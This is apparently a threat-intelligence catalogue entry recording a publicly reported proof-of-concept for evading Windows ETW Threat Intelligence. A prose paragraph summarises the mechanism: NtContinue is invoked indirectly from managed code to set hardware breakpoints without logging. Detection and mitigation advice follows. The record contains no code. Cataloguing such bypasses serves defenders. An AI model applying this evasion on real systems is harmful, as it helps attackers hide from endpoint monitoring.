Bypass Record

ETW Tampering × Microsoft Windows ETW Threat Intelligence

A publicly-reported instance of ETW Tampering bypassing Microsoft Windows ETW Threat Intelligence, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Microsoft Windows ETW Threat Intelligence

Technique

ETW Tampering

MITRE ATT&CK

T1562.006

Confidence

Medium

Severity

High

Status

poc

Disclosed

2026-05-19

Config / version noted

Not stated

Provenance

medium.com
disclosed 2026-05-19 · original source · via exa
github.com
disclosed 2026-05-19 · original source · via exa
github.com
disclosed 2026-05-19 · original source · via raw

Reported as

evading ETW TI detection

Mechanism

Uses Windows internal exception dispatching to invoke NtContinue indirectly from managed code, avoiding the P/Invoke transition frame corruption. NtContinue restores a crafted CONTEXT_RECORD that sets hardware breakpoints (Dr0-Dr7) without calling nt!EtwTiLogSetContextThread, thus evading ETW TI detection.

Detection & mitigation

Monitor for suspicious use of NtContinue with modified CONTEXT records, especially from managed processes like PowerShell, using ETW providers such as Microsoft-Windows-Kernel-Process or Microsoft-Windows-Threat-Intelligence. Deploy endpoint detection rules that alert on calls to NtContinue where the DebugControl or debug registers are altered, and enforce PowerShell constrained language mode with script block logging to limit unmanaged code invocation.

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.